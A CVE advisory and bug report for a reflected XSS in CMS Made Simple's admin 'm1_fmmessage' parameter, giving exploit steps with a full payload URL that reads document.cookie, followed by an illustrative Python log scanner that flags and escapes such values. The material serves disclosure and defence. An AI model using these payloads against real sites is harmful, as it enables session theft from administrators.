CVE-2022-23907: CMS Made Simple - Forge : CMS Made Simple Core

CMS Made Simple v2.2.15 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the parameter m1_fmmessage.


[#12503] A Reflected cross-site scripting (XSS) in ‘m1_fmmessage’ parameter


Created By: fuzzyap1 (fuzzyap1)

Date Submitted: Thu Dec 09 10:15:23 -0500 2021

Assigned To: CMS Made Simple Foundation (cmsmsfoundation)

Version: 2.1.5

CMSMS Version: 2.1.5

Severity: Minor

Resolution: None

State: Open

Summary:

A Reflected cross-site scripting (XSS) in ‘m1_fmmessage’ parameter

Detailed Description:

Technical description: A reflected cross-site scripting (XSS) vulnerability in CMS Made Simple 2.2.15 exists in the admin console via the global ‘m1_fmmessage’ parameter. Once the user completes an action, the page returns a link with the ‘m1_fmmessage’ parameter. This vulnerability allows an attacker to execute JavaScript in the context of the victim’s browser if the victim opens a vulnerable page containing an XSS payload, which can lead to cookie stealing, defacement and more.

Steps to exploit:

  1. Navigate to http://www.cmsms.com/admin/moduleinterface.php and delete any file in ‘file manage’
  2. Insert your payload in the response URL ‘m1_fmmessage’ parameter such as: http://www.cmsms.com/admin/moduleinterface.php?mact=FileManager,m1_,defaultadmin,0&__c=34f443492bff76e8334&m1_fileactiondelete=&m1_path=%2Fuploads%2Fimages&m1_selall=a%3A1%3A%7Bi%3A0%3Bs%3A76%3A%22OGU0ODI3MjgzMDQxMjA3MjAzM2I3MDI3YjJhMDMzMTkzMmIwODkyMnx4c3NwYXlsb2FkLnR4dA%3D%3D%22%3B%7D&m1_submit=Delete&m1_fmmessage=deletesuccess<ScRiPt>alert(document.cookie)</ScRiPt>
  3. Refresh the page

Proof of concept (PoC): The following payload will allow you to run the JavaScript: <ScRiPt>alert(1)</ScRiPt>
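
A defensive check for the issue reported above, added here as an example and not taken from CMS Made Simple or from the original report: it flags access-log requests to moduleinterface.php whose m1_fmmessage value is not a plain message key, and returns that value HTML-escaped, as it should be before being echoed into a page. The key pattern, the function names and the log lines are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

PARAM = "m1_fmmessage"
# Assumption: legitimate values are short message keys such as "deletesuccess".
KEY_RE = re.compile(r"[A-Za-z0-9_]{1,64}")
# Request part of a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Dec/2021:10:15:23 -0500] "GET /admin/moduleinterface.php'
    '?mact=FileManager,m1_,defaultadmin,0&m1_fmmessage=deletesuccess HTTP/1.1" 200 5120',
    '203.0.113.7 - - [09/Dec/2021:10:16:02 -0500] "GET /admin/moduleinterface.php'
    '?mact=FileManager,m1_,defaultadmin,0'
    '&m1_fmmessage=deletesuccess%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E HTTP/1.1" 200 5188',
    '203.0.113.7 - - [09/Dec/2021:10:16:40 -0500] "GET /index.php?page=news HTTP/1.1" 200 812',
]


def check_value(value):
    """Return (ok, safe_text); ok is False when value is not a plain message key."""
    return bool(KEY_RE.fullmatch(value)), html.escape(value, quote=True)


def suspicious_requests(log_lines):
    """Return [(line_no, escaped_value)] for requests carrying a non-key m1_fmmessage."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/admin/moduleinterface.php"):
            continue
        # parse_qs percent-decodes, so encoded markup is checked in decoded form.
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            ok, safe = check_value(value)
            if not ok:
                hits.append((line_no, safe))
    return hits


if __name__ == "__main__":
    for line_no, safe in suspicious_requests(SAMPLE_LOG):
        print(f"line {line_no}: unexpected {PARAM} value: {safe}")
```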
